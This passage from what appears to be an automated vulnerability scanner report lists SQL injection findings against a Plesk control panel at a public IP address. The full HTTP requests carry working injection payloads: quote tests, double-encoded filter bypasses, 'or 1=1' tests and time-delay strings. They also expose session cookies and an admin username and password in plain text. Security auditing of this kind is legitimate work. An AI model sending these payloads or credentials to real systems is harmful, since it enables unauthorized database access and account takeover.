Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73')waitfor%20delay'0%3a0%3a20'--; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;
Content-Type: multipart/form-data; boundary=--------1299797581
Content-Length: 881

----------1299797581
Content-Disposition: form-data; name="cmd"

create_file
----------1299797581
Content-Disposition: form-data; name="previous_page"


----------1299797581
Content-Dispositi
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:40 GMT
Connection: close
Content-Length: 85781

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/ [extract[0] parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-file/

Issue detail

The extract[0] parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the extract[0] parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;
Content-Type: multipart/form-data; boundary=--------852740817
Content-Length: 1606

----------852740817
Content-Disposition: form-data; name="create_file_method"

upload
----------852740817
Content-Disposition: form-data; name="previous_page"


----------852740817
Content-Di
...[SNIP]...
nt-Disposition: form-data; name="htmltemplate"

on
----------852740817
Content-Disposition: form-data; name="file"


----------852740817
Content-Disposition: form-data; name="extract[0]"

on'
----------852740817
Content-Disposition: form-data; name="userfile[1]"; filename="file.txt"
Content-Type: text/plain

555-555-0199@example.com
----------852740817
Content-Disposition: form-dat
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:17 GMT
Connection: close
Content-Length: 91837

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/edit/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------55270169
Content-Length: 1117

----------55270169
Content-Disposition: form-data; name="page_size"

25
----------55270169
Content-Disposition: form-data; name="sort"

name
----------55270169
Content-Disposition: form-data;
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:26 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/ [locale cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/permissions/

Issue detail

The locale cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the locale cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /plesk/client@1/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fplesk.cloudscan.me%2F.Security
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US'; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1908927970
Content-Length: 1628

----------1908927970
Content-Disposition: form-data; name="AllowWrite"

on
----------1908927970
Content-Disposition: form-data; name="previous_page"


----------1908927970
Content-Disposition
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:22 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

Request 2

POST /plesk/client@1/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fplesk.cloudscan.me%2F.Security
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US''; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1908927970
Content-Length: 1628

----------1908927970
Content-Disposition: form-data; name="AllowWrite"

on
----------1908927970
Content-Disposition: form-data; name="previous_page"


----------1908927970
Content-Disposition
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 05:04:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:23 GMT
Connection: close
Content-Length: 965


       <html><head><title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20100707.19"/></script>
       <script language="javascript" typ
...[SNIP]...

1.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/ [show-getting-started-popup cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/permissions/

Issue detail

The show-getting-started-popup cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the show-getting-started-popup cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fplesk.cloudscan.me%2F.Security
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false')waitfor%20delay'0%3a0%3a20'--; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1908927970
Content-Length: 1628

----------1908927970
Content-Disposition: form-data; name="AllowWrite"

on
----------1908927970
Content-Disposition: form-data; name="previous_page"


----------1908927970
Content-Disposition
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:14 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/rename/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fhttpdocs%2Fstatistics%2F
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1777036819
Content-Length: 1147

----------1777036819
Content-Disposition: form-data; name="page_size"

25
----------1777036819
Content-Disposition: form-data; name="sort"

name
----------1777036819
Content-Disposition: form
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:48 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/rename/?1"=1 HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fhttpdocs%2Fstatistics%2F
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------1777036819
Content-Length: 1147

----------1777036819
Content-Disposition: form-data; name="page_size"

25
----------1777036819
Content-Disposition: form-data; name="sort"

name
----------1777036819
Content-Disposition: form
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:44 GMT
Connection: close
Content-Length: 84811

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/view/?1%2527=1 HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/?cmd=chdir&file=%2Fprivate%2F
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;
Content-Type: multipart/form-data; boundary=--------748587290
Content-Length: 1132

----------748587290
Content-Disposition: form-data; name="page_size"

25
----------748587290
Content-Disposition: form-data; name="sort"

name
----------748587290
Content-Disposition: form-da
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:42 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/ [user cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the user cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/?cmd=chdir&file=%2Fprivate%2F
Cookie: PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8',0,0,0)waitfor%20delay'0%3a0%3a20'--;
Content-Type: multipart/form-data; boundary=--------748587290
Content-Length: 1132

----------748587290
Content-Disposition: form-data; name="page_size"

25
----------748587290
Content-Disposition: form-data; name="sort"

name
----------748587290
Content-Disposition: form-da
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:04:23 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SERVICE_POSTGRESQL already defined in <b>
...[SNIP]...

1.15. http://174.122.23.218:8880/smb/file/email [user cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://174.122.23.218:8880
Path:   /smb/file/email

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the user cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /smb/file/email HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/external
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4%2527; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 1120

linkExpirationTime=0&emailSubject=Link%20to%202010-attacks.jpg&emailBody=Hello.%0A%0ANew%20files%20are%20uploaded.%20To%20access%20them%2C%20use%20the%20following%20links%3A%0A%26%23x0033%3B%26%23x006
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:41:04 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

POST /smb/file/email HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/external
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4%2527%2527; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 1120

linkExpirationTime=0&emailSubject=Link%20to%202010-attacks.jpg&emailBody=Hello.%0A%0ANew%20files%20are%20uploaded.%20To%20access%20them%2C%20use%20the%20following%20links%3A%0A%26%23x0033%3B%26%23x006
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:41:05 GMT
Connection: close
Content-Length: 87

{"redirect":"\/login?returnUrl=%2Ffile%2Femail","status":"success","statusMessages":[]}

1.16. http://174.122.23.218:8880/smb/login [force parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The force parameter appears to be vulnerable to SQL injection attacks. The payloads 21243057%20or%201%3d1--%20 and 21243057%20or%201%3d2--%20 were each submitted in the force parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /smb/login HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/login?returnUrl=%2Fdashboard
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; show-getting-started-popup=true; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 165

loginSection%5Busername%5D=admin&loginSection%5Bpassword%5D=Nose1Dive&loginSection%5BrememberMe%5D=0&loginSection%5BrememberMe%5D=1&returnUrl=%2Fdashboard&force=021243057%20or%201%3d1--%20&_=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:07:22 GMT
Connection: close
Content-Length: 56

{"redirect":"\/","status":"success","statusMessages":[]}

Request 2

POST /smb/login HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/login?returnUrl=%2Fdashboard
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; show-getting-started-popup=true; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 165

loginSection%5Busername%5D=admin&loginSection%5Bpassword%5D=Nose1Dive&loginSection%5BrememberMe%5D=0&loginSection%5BrememberMe%5D=1&returnUrl=%2Fdashboard&force=021243057%20or%201%3d2--%20&_=

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: user=af4eeee16ffc0e2e08fc0e9796c851c5; expires=Tue, 09-Nov-2010 05:07:24 GMT
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 05:07:26 GMT
Connection: close
Content-Length: 65

{"redirect":"\/dashboard","status":"success","statusMessages":[]}

1.17. http://174.122.23.218:8880/smb/redirect/pleskin/root// [PLESKSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://174.122.23.218:8880
Path:   /smb/redirect/pleskin/root//

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the PLESKSESSID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

